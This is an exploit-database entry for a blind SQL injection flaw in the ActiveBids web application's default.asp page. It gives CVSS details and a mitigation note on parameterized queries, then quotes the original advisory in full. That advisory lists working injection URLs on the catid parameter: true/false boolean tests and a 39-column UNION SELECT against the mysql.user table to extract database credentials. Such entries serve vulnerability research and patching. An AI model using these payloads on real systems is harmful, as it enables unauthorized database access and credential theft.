header-logo
Suggest Exploit
vendor:
ActiveBids
by:
Hussin X
8.8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: ActiveBids
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

ActiveBids (default.asp) Blind SQL Injection Vulnerability

ActiveBids (default.asp) is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials and other confidential data. The vulnerability can be exploited by sending a specially crafted URL to the vulnerable application. The URL contains a malicious SQL query that can be used to extract data from the database.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries. This will ensure that the application is not vulnerable to SQL injection attacks.
Source

Exploit-DB raw data:

ActiveBids (default.asp) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : hussin.x@gmail.com
____________________________________

Vendor : http://www.activewebsoftwares.com
Demo :
_______

http://server/default.asp?catid=39+and+1=1 ( true )

http://server/default.asp?catid=39+and+1=0 ( false )

:: test ::

http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+mysql.user

Greetz :
WwW.IQ-ty.CoM

| CraCkEr | Cyber-Zone | str0ke | jiko